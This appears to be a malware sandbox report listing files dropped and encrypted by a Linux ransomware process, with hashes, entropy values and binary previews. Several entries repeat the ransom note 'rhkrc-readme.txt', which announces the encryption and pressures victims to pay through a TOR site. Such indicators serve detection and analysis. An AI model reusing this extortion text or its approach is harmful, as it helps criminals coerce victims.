                  Preview: .k..!..t..GnM..D ..k.o..s...._=..]..8....l....L<.,/.0.~......tG.yAO.:.7.W.......Y}....}Q...y...o..Q....T.@BB..I......>.F.&..7 W).Q}..g.=.b.p....;..H..jM$..J...;....(.%A...... ..l...Q...A....J...LP.C.c}....E=...hw..ZU..J.RI.......C.\..../"..#.H..E.%...)..m....g|H.F..%..C..{......LXO..I.u0..EJ.....N+.....44X.c........J.8...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................5<X...O....s6...@YT.".Z.' "*I....k..J...i.].............
                  /home/user/.cache/upstart/update-notifier-release.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):331
                  Entropy (8bit):5.955838719298738
                  Encrypted:false
                  SSDEEP:6:WK7at9IMfqPEA+LSd1w77A1zmhOO/EUyp6Xcc2vjMk:ovOy7w2DcUBovx
                  MD5:BC40F02DED009E2EF012E82107A0E393
                  SHA1:09D0BCFF699AC00EA993CD87CC2AF8031B74F6DD
                  SHA-256:CF32A439BC7C5EBEBD138B2785F7FBB01126D104F4BF94727ED1DC10A555C502
                  SHA-512:C3984ED6885D658EA8E9D7D788C4286B155C3040C4503586DCA1495929D2C826B0864D4A5C9F6264E14F6E08969406FA37B7C97A1249C21095E4D38EA318B0B8
                  Malicious:false
                  Reputation:low
                  Preview: ...C.~.T.......m.z........DY.*.jqHH.......`..........Y).j.i......\.".w@.....qG.....Q....b.?^.......%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................f..8....c9.p.........&z.<}x...NG.;n!...r..u$.........\..
                  /home/user/.cache/upstart/update-notifier-release.log.2.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):335
                  Entropy (8bit):5.985853628331654
                  Encrypted:false
                  SSDEEP:6:65fhzH/shACXPLHYOpqkHFP5g+1zmhOO/EUyp6Xcq2P2V/0i4lXV:KNfshTHfrFP+a2DcUBt2P2N0iI
                  MD5:93220910D1545AED66EA9033B187B1FE
                  SHA1:34B104BC6D06637813798AC01F415BFF8D195014
                  SHA-256:54F404B97187BBDB8AD0EFA9F1C5C52A12FB96A67DF6429A0BB9B3E99C031B47
                  SHA-512:E2CBFDD5EA57DB181E96C36B456ECABAF5333F02AA36502E02B3A8A2C11FAA583ED5A161A47D263EB459A3BCE1C7327D41DFBAE6594E75AA5177443EC742CDE4
                  Malicious:false
                  Reputation:low
                  Preview: .~.._r....U@wA....7x......=.....>....}I..lk..e9._..u.....T....F..r-=..r.Lv.\?....O.K..cV....e<1.o.q*.!.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................Z..H.M}.@.K....a(.>w*....;A..>.4..q...................F0
                  /home/user/.cache/upstart/update-notifier-release.log.3.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):331
                  Entropy (8bit):5.877484398595384
                  Encrypted:false
                  SSDEEP:6:BFIam/pneETbxqxQZdu+sVm/PXKy1zmhOO/EUyp6Xc6o7BK2XW:BCaapeWk+sQv2DcUBzo7Bdm
                  MD5:EFE44DC3CD896785B8CD468ACA2EB022
                  SHA1:A22B019CD55700B22305BA06F286D29054F0F782
                  SHA-256:4559269A4F49A737B8D99D3FACFF8672BB6DD0049045203178D7DBC9AF17AAD8
                  SHA-512:4074E2A05060C2029BF12979690A11BACE6BBA1D1DB73DF6B29BAD81CC152E02FD4167DD2EB7CA2943E2958E46A4E65DE63BEAF4FB53512220350EF56A9C019D
                  Malicious:false
                  Reputation:low
                  Preview: R....2.gPr..`.w....7!vQCP...E.........V..v[..e.e....I.....F..~1.QMruVI..8.y3........F...0.4$,....g1%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.................................................................................................Y:SUg-.....>....1..U..uk.rg.9>.w3)...........f.
                  /home/user/.cache/upstart/update-notifier-release.log.4.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):305
                  Entropy (8bit):5.710989708841048
                  Encrypted:false
                  SSDEEP:6:mQo/sT6xpvkrm9ADy1zmhOO/EUyp6XcgElzDH:0xtiwmO2DcUBhwzb
                  MD5:7E98F112AC43ED1F9BAED4E9657ADCA2
                  SHA1:D70A0913BFF4776A809C0EA534901A923B2A1EC7
                  SHA-256:8BC8097B214E24137FE9242762241EA551560413A1409E51EBFFE0FADA574C97
                  SHA-512:17B60B4D6F05A87A08179D3DFC6C420A9F095A8044C37F80903D254862438481ABB0C451C5FD61858E7A368813B0A5751F08F9E903A85DA094EBF18B593A28C5
                  Malicious:false
                  Reputation:low
                  Preview: T.8...]...n.'. ..$.r........n...7d#{.A....$.?....}..NwQ.H.....O....Ua.|53%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................Q......P..Y=.c....l....2.4.v..1c....yc..........S1..
                  /home/user/.cache/upstart/update-notifier-release.log.5.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):6.0298747437087705
                  Encrypted:false
                  SSDEEP:6:4ljYRRVuWco+0E/jbHTARwSGy1zmhOO/EUyp6XcMwJcAr3n:4UVuWco6jM2O2DcUBQJcAr3n
                  MD5:4C3E1FD1E3142B86A448F2C193F32966
                  SHA1:2A02608558EC29CF05EC36F8ABD2E2BA3056FC91
                  SHA-256:91B97A8A2E325E9418F4AE702754A54AC3CA0CA1DC3E934F786D0015B952536F
                  SHA-512:72CAA3CA6123B589DDBE0763304E5BEFACCA45D07404113417AB3B9F07F3B6A7C6451F07341D8CBB487EF63A6D0BAE00D1D260FA3477D8BB29C59C85AAA35B68
                  Malicious:false
                  Reputation:low
                  Preview: .ae.,.a...D.E.....M.e.....d.)...G.;.&..E.ND..!..f.U.[.B.....1...:..+...8".l..SW*..5.B..o...<..@WI.!.........%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................8...n%....S.q@.u.........M./t.+?}9%....^\.b.........%."
                  /home/user/.cache/upstart/update-notifier-release.log.6.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):304
                  Entropy (8bit):5.639999915569966
                  Encrypted:false
                  SSDEEP:6:+OhACOgfv2t91zmhOO/EUyp6XcmWNqvNi+R/:+KgHD2DcUBLKqvn/
                  MD5:9028329D7DD52EE64BAFE4111829045F
                  SHA1:BF5EC5B5AF01F5E4507F2721A2B45F63F37073DA
                  SHA-256:4AFC5FE6B877ACD25B9C28713A2395E5526914CCEAD93312EAF715B17F7788C7
                  SHA-512:60888561FD0B11B7132C53348AFD372266D41FEEF72C3A85CA429D93FAEC013A2A3B76E94F497BC0DDA341F72996423AF9DB65B83DD596E77ED5B2D1CC0F9F3E
                  Malicious:false
                  Reputation:low
                  Preview: .s.xG.nPw....5.....z.).1z^4.q.41....1k.../*...q..(..:.g..:..Ec..2.......%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................q.'%..hh..=....oIG=8.B.o...D=!tx.....;:.+...........8
                  /home/user/.cache/upstart/update-notifier-release.log.7.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):312
                  Entropy (8bit):5.786346849981266
                  Encrypted:false
                  SSDEEP:6:HxbRFC6XCx32GGCU1zmhOO/EUyp6Xc+LOJ49cpKI:RC6XCdi2DcUBH+V
                  MD5:C91633AFDBDA8B477905DD5E5732EAD1
                  SHA1:320345876600F01E430EC1FA8FD0FAAE6B7CDC2F
                  SHA-256:D7B5900CACE658AA1976C253E0E1ED41ED265A829C66F2ED14695DD9EBD5CE89
                  SHA-512:FEC2027002B16584F1F054E23F65C493350FD445C8312F76BD60294C6013295833A385C689A7E0C668E9407C9860582A6F36D01BCB42D17738C7FA6631171C1A
                  Malicious:false
                  Reputation:low
                  Preview: '9"L.@wd.......mU.>T.`gY...T....D(9....s.....6+]J#.*3..nG=.....kt..=.........n..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................s`...........V...?V...u&`i..Z..pAfj.w.Z..tLK........0..P
                  /home/user/.cache/upstart/upstart-event-bridge.log.1.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):309
                  Entropy (8bit):5.7659759726081345
                  Encrypted:false
                  SSDEEP:6:2Nza7PcH6y3FRqj0s+1zmhOO/EUyp6XcyRiX+soulj:qO7PcaUqIn2DcUBPQX+sVj
                  MD5:5D81B901861A274CD25B02C4A88190D4
                  SHA1:0CDA80DB4D6E69E90AC3C0AA83DF11F409AA42D1
                  SHA-256:858E054CB8F442F06A7AC56AE49507D88B77DB450B8417573F17C3C1580F9882
                  SHA-512:6D274B25A4A7F31A685DFF8329DFF0CF8AA0D582DDD5303BC0FEE90858E6089B15D05E4C22A40DF5E3459308A89F33754CEA24E75DA254E92EACB22B636E3AC2
                  Malicious:false
                  Reputation:low
                  Preview: t.(A..-.~.w....*.6.v............k"......"hi.gD.......q.Q.}Q.@.d.....OJ....t.3%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................>d..C..CTK..nlX.,6BI..x.` ...(.k.U~.......dO..........t.
                  /home/user/.cache/upstart/upstart-event-bridge.log.2.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):325
                  Entropy (8bit):5.927942321561031
                  Encrypted:false
                  SSDEEP:6:MgeCpXFQY8qYRUHrxuA/+1zmhOO/EUyp6XcnqGkodM/yC:MgeUYRAIka2DcUBYZC
                  MD5:F607636CFE7518C93D89C67F6BAB846D
                  SHA1:1734243535710F51B1F37450010F7E13EE7B8F2A
                  SHA-256:CCC0595BC8348D17B78920C3B67A2F2AB7016652ADCEACAEFF9A6A010BB3746B
                  SHA-512:3BABD0247218B14F1276104B93F6E18D247CD63DC61902029D91AAE00B6C548CCE301D131F9E335C86B27801BE6404C06D6831ABD6C9821B7AE50150D8B63B74
                  Malicious:false
                  Reputation:low
                  Preview: ..i..4...9...$...P.}......66....G.f...M4(.]ayW......[..9L.>x...Y...L.+DB).,.2o f......=.#:..z%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................=...T=O.@....*?.p|....K....~p.t...4...u..B_..........o<
                  /home/user/.cache/upstart/upstart-event-bridge.log.3.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):308
                  Entropy (8bit):5.717922082711741
                  Encrypted:false
                  SSDEEP:6:qIITKD9adA01zmhOO/EUyp6XcbcXougAfvEldx:ZGZqo2DcUBZzgAfvElz
                  MD5:B3B3F975F692AAEF3F3A072E7E6F340C
                  SHA1:F5060ABE3AEE5FB83341FBAEB6AF34A483111BA2
                  SHA-256:9CEEC0F167AFF4E28A1760BE309F0C053B72AA4DE952C735BADBEB5FBD82C506
                  SHA-512:22A6DDF0971CE2B9531E8FDC48E0FEF3DBD3B91A78575C8D68ED837361F23FEE00817B66781DDC24A7DBBCDE79007FBE99DDB501533EAC061C16A72078DD3859
                  Malicious:false
                  Reputation:low
                  Preview: ....s/'Q..;....nf...'.w.......4..L.Q ;Q...hX.d.{.....0..z.y..OrNEE...p....R.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................=.....4.~.@|.kw.;D.).9n}!...e..U7.9..Q..u..a........a...
                  /home/user/.cache/upstart/upstart-event-bridge.log.4.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):300
                  Entropy (8bit):5.594586204740002
                  Encrypted:false
                  SSDEEP:6:S3sTgWPB11zmhOO/EUyp6XcAjMb9Dg34oN:S3wgWPJ2DcUB298IoN
                  MD5:E56E9D934C7A72141E8AA147E01D9661
                  SHA1:BED34D27FED242337F1D47E19C45EDBA5A488B38
                  SHA-256:F6D3079D9F796D57454466E66C11F9D88BDB10404B047F79728D0D6F52BC5BA0
                  SHA-512:C12B4F3FCC2C4BAB8EA5842E33FADF4A429EF81970CB1903F2687F21F19072375FE9E98BF2971DD584E3812560A08E621075542A6E079D1F1B1F7CA0D4E6F1B5
                  Malicious:false
                  Reputation:low
                  Preview: D..A....A^s&gV.*...|t.i..^,+........5.....^...o3.ncZo)...r...9..9.{.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.......................................................................................... (@-..S...._a..ha..........{....).e.].g..~........&...
                  /home/user/.cache/upstart/upstart-event-bridge.log.5.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):308
                  Entropy (8bit):5.7625173343140474
                  Encrypted:false
                  SSDEEP:6:D+HLHu+NKKhbKgBU1zmhOO/EUyp6XcPtKG5aWqO8VXNn:D+HXZh7y2DcUBwthoH
                  MD5:FD6E36925A09E9B05B6FFD94C09BD05A
                  SHA1:572CB013FF104048B9EB8D280BFF46D2348672B5
                  SHA-256:7180FB54FF5922E1C40655F0FD0DEC5ACDB8435B27CC9867F6894A4BC65E38AB
                  SHA-512:BC5B706AED0CEA181E7E2922ADD3E7A610380BFC9BA6B613A8DF9C2873722C1CB8749093F78021B54F3DA206337D34A4422742F67C06205E21E6A812C03B7E1B
                  Malicious:false
                  Reputation:low
                  Preview: ...Yjcg..p.../.8.D.&Z.c...G..^.G.#..B..K...*..h........."..O....N._.]7L.-m.8%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................\...d.p3...2...._0.]......?.b..5$.3\.s..............}u..
                  /home/user/.cache/upstart/upstart-event-bridge.log.6.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):300
                  Entropy (8bit):5.673951481852461
                  Encrypted:false
                  SSDEEP:6:CfGkSL3yOSmhF3MaJjz1zmhOO/EUyp6XcorLO:GGkSTkWpMq2DcUB7r6
                  MD5:6F88C7FC6A6C75A4D0FD5C217C5D0E03
                  SHA1:301100BAEF468BD2F7A1029BC70855DCD64EE031
                  SHA-256:3C578639F011D9A77A960523FBF64A7FA721B98B45B21959A2DB356A87DC8875
                  SHA-512:26ADF3157CEC54419490D3B22799A03EC5C59A58AD709FF82DB23875B9470CFEEEFA720E25014AF1C5BCDAC2C4AD09E14B1DD18103B3BC51AEFDFB483D72E168
                  Malicious:false
                  Reputation:low
                  Preview: Mz.+....C.y=x..Q....$I..1W[,d.K..R...'^C..7.`HTO..M<.xa7Z..dx.e.<.%.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..................................................................................................mJw.?.:.......C....:.r..1....V.^2.........n.|+
                  /home/user/.cache/upstart/upstart-event-bridge.log.7.gz
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):300
                  Entropy (8bit):5.686415788145451
                  Encrypted:false
                  SSDEEP:6:fbo599gD+y1zmhOO/EUyp6Xc+aAy0Jbo4A8/Kn:DuTZO2DcUBEZ0lo48
                  MD5:D01C27D4255B4B9CFA8ACDB322D3EBAB
                  SHA1:4106174627438DD0914CCED35A7693B6E0DD7FA0
                  SHA-256:F9C47CC32F04FFF2519F5AD7FC01038956A1A35680DF756C80588BE95E057BC0
                  SHA-512:B84E98741CA2ACCA02EEE55BE941DC952C6093A1DEA849B66B668BE697644FB99F5AAFC3E1295F75F21A3A12ED2F0EA07C72A6DC4EDF468DCE1D69E4BFF583B5
                  Malicious:false
                  Reputation:low
                  Preview: ...qqW.G=..#.i.8.~y:....R........1...1.E.6.9.F..U..x......x.L.s.q...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................DxU..K.....b....;....{....c..0@......M..t.I...........z.
                  /home/user/.cache/xfce4-indicator-plugin.log
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):5513
                  Entropy (8bit):7.939941649306988
                  Encrypted:false
                  SSDEEP:96:I3kj49U28MpDdv0o7T+XbKaRPBv8MouK82yKOSneBkjZ2azdkU9BuGODPj:lfMpDdceKdxVke2yt7SP90/Tj
                  MD5:5C36EE6AA4546FC32D7093921283CE0E
                  SHA1:FB18C002D2D14E8B8F63ED1B608581C51D5903DF
                  SHA-256:62D0671D07BF023D98A4FE029D7D6926F39A4E96C2F8DD982F35F9777D3DE33D
                  SHA-512:B4B018B1BAFE173572113ED2B0D667C0147F2E8CD896EB31DA47CA740607FF4492F0F37AF53A9B34B05C12BA8C9744D223B592DDC5CC62928FFE57249FB6DD76
                  Malicious:false
                  Reputation:low
                  Preview: .G..........a.k.p.......A..U....@.h~...93......5."c[...]...,..%."....y."F...Sk....j.."C.../!B).s..4........xAChH..l..rX[0K..<....8.:.~j...Z;.7U..S......P..P3.....0o"]n.....6..M[fM...H.N....[........."_tnur..Z.....&..qRNL....,...=R.../...@0@1.. .gc...m...a...}V......[U...s......t..U(..de\.j...f..~...K.H}..k.9...b....h.....F .y.;..<0..._O.\LT.Ak.3........M.....!. ...2u.C....7Q..t.bU...uD(...}|K.=....)V.X;:T.+..g.....lK..g.........v....*...K..rM..*.\s...:.;A.&..H..s..)@..{2....Q..S.\.$......0..........x.).S?.wPQ...]..&..P.AKA..` ..W........2...k!.....$;..Li...}xx&".|.....f7..B...:SY.eZ..I..6........SC8.>.4.....}...h+.m'.{......X...3.).G..yOY..5.ig.4..Y.NL.6...U......H......y..-.[...s....q."u...mP.o9}X....L.q.<..S..'r)JL......#s."......F._E.......!...h..k..3.._#...%...".+#E....]..lf..5.......d.)T.8....u.F .A..E..'....Xq........Nv...k...Cp.u...!.<.........4.5U. J..)..W.p/C.Z.G8..O.!.-. ..#...=Fe.p...p..-.>...H1Ag.......+ZX...5..9q.sc.......v.*.\..*.D{....$....I..n$.*.....yx..e......z...EY..
                  /home/user/.cache/xfce4-notifyd-theme.rc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):289
                  Entropy (8bit):5.519421832727749
                  Encrypted:false
                  SSDEEP:6:qtF1qAqROSsJ1zmhOO/EUyp6XchVbUfved4/:qV/qROh2DcUBkVRd4/
                  MD5:ADB4B86CED9BFD36107C0F4F5FC1B919
                  SHA1:91BF3D12E5BA264AD38120EAB9716D672856B76A
                  SHA-256:56F79E2AE712A5EFAD663ADC960EF4556243E90ECD5AC9F072CE5E1F6C6741EB
                  SHA-512:045F3233E3E45A288E1345EC5A5BFCB1811409804658F8B4997A5AEA7A141291CF1573049504E62E3CA8026D6D4709626A0B0AD10219C4078D25BA6B73D3F1DE
                  Malicious:false
                  Reputation:low
                  Preview: .j.P....C....i......8.p.'.%.O.%.*.i...6...4A.^....en.~...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................Y.......G.'.M0..d.K.nx.g....Hx.R.d#...i.................
                  /home/user/.config/Thunar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/Thunar/uca.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):845
                  Entropy (8bit):7.36928063704657
                  Encrypted:false
                  SSDEEP:12:eqkcPnMK/+97YIEujzIqdZmZIFv4uh4CUNObaddgPJVveDYu3s/TCl3QxC2DcUBM:ecnIY5kmCLhPUoodousJxC2DfzrO
                  MD5:3686AE52F2CC47AFE2E7F64CC083AF21
                  SHA1:D9F6DC3EFB84ABC501B6BC8BD13F6AF6F2ADBCD4
                  SHA-256:6A0F99B77E8B17964C864BCFB490734279C56246E0AE3023B48DEC0DFD4F4F8C
                  SHA-512:EC9B1F4CA3E2885BC71350ED9E3191F8F24BE386E10003D66FFBC45E73AF9D4399DCDFF5DFCAE5B22CCC6A0A4BB427FF546DA73FBDEFE1E41898B6B30C8227F1
                  Malicious:false
                  Reputation:low
                  Preview: ..V....).B..l@..]..B.9.LTs.M./..r...^..sp.Bo....=.i.]d.N..<_.#H.a.92..1..+..p....2..%..B....Z.{.2Q......1.......jk...)=FO.........Y..H...0..p.....B..[.^.q......<.....!.........FwK]..eSM9T..'.J.....R.cf...|.....&.Q.....R...#.!jH......U.T&_..P....48.5.w_.=f.\...Z...~.6d.......~..........}.q(_..v.yr..H..f........z....(...3h.ThU.*.8....g..Q^..'.(..K.d..3...+.Y...3;O(.....)8o.._.....t.A..-.../..<.......";6Nd/.....A."u..rOQD.......VW._..|[...t..........~.(......p...I....-...%(..i.$..{M..].?.v..\....>...Kt..8...y.=I.......2...Q....eYE..BSeB..!.a.5..M.`..@...<~....Dc...R..z.. .......Y..$...1...*....;.. .....=<.x..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................O..`A.(..b..D..r..^X..e.p..7.(B..r).Z..N........F...
                  /home/user/.config/autostart/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/dconf/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/dconf/user
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):2396
                  Entropy (8bit):7.836850563489509
                  Encrypted:false
                  SSDEEP:48:IDLdOUfIng36Itm1GmbSlenvF2xj8jj7BBtoF6KDG0:GdvEItmFmlGOAjRBtoFbDG0
                  MD5:38E158B1A7EC61EEC2FFB0FFD0583050
                  SHA1:60F9AC4531C8EFD0BFC431E927918A10B4AB96FA
                  SHA-256:41358BF60D2FB825087CD7BE2AA2258246D75A2A24CB6036D5477E0D6D9A02DD
                  SHA-512:45814477092E65E0EB36F5D2269C46C9F23A51B900C209C153C1129DED184B7F2231B96017D1A215D9E4611B548DC61CB0F33B11C6049C40E226F6B0E9317BDD
                  Malicious:false
                  Reputation:low
                  Preview: .9...........p...O........F`.3....^<...f....z..6J.&..xX.(2..6....!..cTEd....f./.Y.@..l,.80.....c....n..^..mU..)W..,@.z....W.....V...u1r/..`...1.G...r.J..p.|..J....0=.c..=.i|x]...h.!84...R.S\WQ....)5.>l...../.j...d.$..%.:...Wz.J.i.+.l....Ic...5.n....a...V.g..N..............;.0.......!....$.W.....n......B..Dh..i/.........!..^..5`.v..J..-fZ..s....`....q.VoX|y...."&^a3......@.!...az..)C...b..C..P.-..N..&0{.Q`.....FM ..h.~.QHl.yt=....NE.I..4.'.$....sm..8...?"k.*@...[V......K....r....F.`C......'.T.Ld...X..B....?..h.h...!<.X..Sg.......*<_.+.._0.G-.zr...^.g.{.4.+.2.."...WKC......!Q6.U.U......r.-+........W.Zr+....m.Y.q....G....nC]..)........A{....x.<..Ep._g...ft6k....v.y:.......S4..\.l.?.$FT.y..|......P......h.)#..~....)BL^..sk.-J....O..=Z.U.@....._H.v.>J........*..;T...n*.REC........#`.......a{....zZ..;.....A.`...J.l.q.v.....t(.....E>.].V.h...Tm... Y#}.....A.c....S.y.Z.2s.......V8..U\.....8................|3U...... Ux..Y...#.....$j(:c.8{c.^V4..7...ds..i....K?...9........H/.......K.. ..d..*.Kl<
                  /home/user/.config/evolution/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/evolution/sources/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
